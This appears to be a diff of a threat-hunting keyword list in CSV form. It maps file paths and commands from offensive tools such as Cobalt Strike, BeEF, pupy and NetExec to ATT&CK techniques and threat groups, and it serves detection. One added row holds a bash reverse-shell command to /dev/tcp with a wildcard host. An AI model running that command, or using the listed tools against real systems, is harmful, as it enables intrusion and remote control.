T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/realoriginal/beacon-object-file","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*/BeaconTool.java*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" -"*/beef.git*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/beef/extensions/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/beef_bind_shell/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/beef_common.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/beefbind/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/beefproject/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/BeaconTool.java*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/beef.git*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beef/extensions/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beef_bind_shell/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beef_common.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beefbind/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beefproject/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*/Ben0xA/*","offensive_tool_keyword","Github Username","Github username of known powershell offensive modules and scripts","T1059 - T1027 - T1064 - T1086 - T1191 - T1202","TA0002 - TA0003 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Ben0xA","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/BeRoot.git*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/beRoot.py*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" -"*/beroot.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/beroot.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/BesoToken.cpp*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*/BesoToken.exe*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential 
Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*/BesoToken.git*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" -"*/bettercap*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/bettercap*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/bh_owned.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/bhqc.py -*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - 
T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","0","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" "*/BIFFRecordEncryption.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/bin/0d1n*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/bin/AceLdr*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","712","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" -"*/bin/fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2513","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*/bin/AceLdr*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*/bin/bash -c 'bash -i >& /dev/tcp/*/* 
0>&1'*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/bin/fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*/bin/gorsair *","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" -"*/bin/hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*/bin/posh*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/bin/pupysh*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/bin/hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*/bin/nxcdb*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/bin/posh*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - 
T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/bin/pupysh*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/bin/read_i.php?a1=step2-down-b&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-c&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration 
simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-j&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" 
@@ -2840,17 +2846,17 @@
 "*/bin/read_i.php?a1=step2-down-r&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*/bin/read_i.php?a1=step2-down-u&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*/bin/Sleeper.o*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z"
-"*/bin/unshackle*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z"
-"*/bin/wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z"
-"*/bind_powershell.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*/bin/unshackle*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z"
+"*/bin/wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"
+"*/bind_powershell.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
 "*/bin-sploits/*.zip*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
-"*/BITB.git*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2645","463","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z"
-"*/BITB-main*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2645","463","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z"
+"*/BITB.git*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z"
